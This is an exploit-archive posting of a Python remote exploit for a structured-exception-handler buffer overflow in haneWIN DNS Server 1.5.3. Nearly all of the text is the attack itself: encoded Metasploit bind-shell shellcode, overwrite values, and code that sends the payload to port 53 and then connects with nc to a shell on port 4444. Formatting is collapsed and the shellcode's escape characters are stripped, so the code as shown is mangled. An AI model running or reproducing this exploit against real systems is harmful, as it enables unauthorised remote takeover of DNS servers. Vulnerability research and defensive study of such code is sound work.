Home / exploits haneWIN DNS Server 1.5.3 Buffer Overflow
Posted on 31 January 2014
#!/usr/bin/python # Exploit Title: haneWIN DNS Server (SEH) # Author: Dario Estrada (dash) https://intrusionlabs.org # Date: 2014-01-29 # Version: haneWIN DNS Server 1.5.3 # Vendor Homepage: http://www.hanewin.net/ # Vulnerable app link:http://www.hanewin.net/dns-e.htm # Tested on: Windows XP SP3 # Thanks to God, to my family and all my friends for always being there # # Description: # A SEH overflow occurs when large amount of data is sent to the server # import socket, sys, os, time usage = " Usage: " + sys.argv[0] + " <host> " if len(sys.argv) < 2: print usage sys.exit(0) host = sys.argv[1] shellcode = ( #msfpayload windows/shell_bind_tcp R | msfencode -t c -b 'x00xffx0ax0d' "xb8xdfx64x04x29xd9xc7xd9x74x24xf4x5dx29xc9xb1" "x56x31x45x13x83xedxfcx03x45xd0x86xf1xd5x06xcf" "xfax25xd6xb0x73xc0xe7xe2xe0x80x55x33x62xc4x55" "xb8x26xfdxeexccxeexf2x47x7axc9x3dx58x4axd5x92" "x9axccxa9xe8xcex2ex93x22x03x2exd4x5fxebx62x8d" "x14x59x93xbax69x61x92x6cxe6xd9xecx09x39xadx46" "x13x6ax1dxdcx5bx92x16xbax7bxa3xfbxd8x40xeax70" "x2ax32xedx50x62xbbxdfx9cx29x82xefx11x33xc2xc8" "xc9x46x38x2bx74x51xfbx51xa2xd4x1exf1x21x4exfb" "x03xe6x09x88x08x43x5dxd6x0cx52xb2x6cx28xdfx35" "xa3xb8x9bx11x67xe0x78x3bx3ex4cx2fx44x20x28x90" "xe0x2axdbxc5x93x70xb4x2axaex8ax44x24xb9xf9x76" "xebx11x96x3ax64xbcx61x3cx5fx78xfdxc3x5fx79xd7" "x07x0bx29x4fxa1x33xa2x8fx4exe6x65xc0xe0x58xc6" "xb0x40x08xaexdax4ex77xcexe4x84x0exc8x2axfcx43" "xbfx4ex02x72x63xc6xe4x1ex8bx8exbfxb6x69xf5x77" "x21x91xdfx2bxfax05x57x22x3cx29x68x60x6fx86xc0" "xe3xfbxc4xd4x12xfcxc0x7cx5cxc5x83xf7x30x84x32" "x07x19x7exd6x9axc6x7ex91x86x50x29xf6x79xa9xbf" "xeax20x03xddxf6xb5x6cx65x2dx06x72x64xa0x32x50" "x76x7cxbaxdcx22xd0xedx8ax9cx96x47x7dx76x41x3b" "xd7x1ex14x77xe8x58x19x52x9ex84xa8x0bxe7xbbx05" "xdcxefxc4x7bx7cx0fx1fx38x8cx5ax3dx69x05x03xd4" "x2bx48xb4x03x6fx75x37xa1x10x82x27xc0x15xcexef" "x39x64x5fx9ax3dxdbx60x8f" ) nSEH = 'xebx06x90x90' SEH = 'xd1x07xfcx7f' opcode = "xe9xdfxf6xffxff" junk = 'A' * (2324 - len(shellcode)) padding = 'A' * 600 buff = shellcode + junk + nSEH + SEH + opcode + padding print "[+] Connecting to %s:53" % (host) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, 53)) aix= shellcode + 'A' * (2324 - len(shellcode)) print "[*] Sending payload.." + " shellcode: " + str(len(shellcode)) s.send(buff) print "[*] Exploit Sent Successfully!" s.close() print "[+] Waiting for 5 sec before spawning shell to " + host + ":4444 " time.sleep(5) os.system ("nc -n " + host + " 4444") except: print "[!] Could not connect to " + host + ":53 " sys.exit(0)
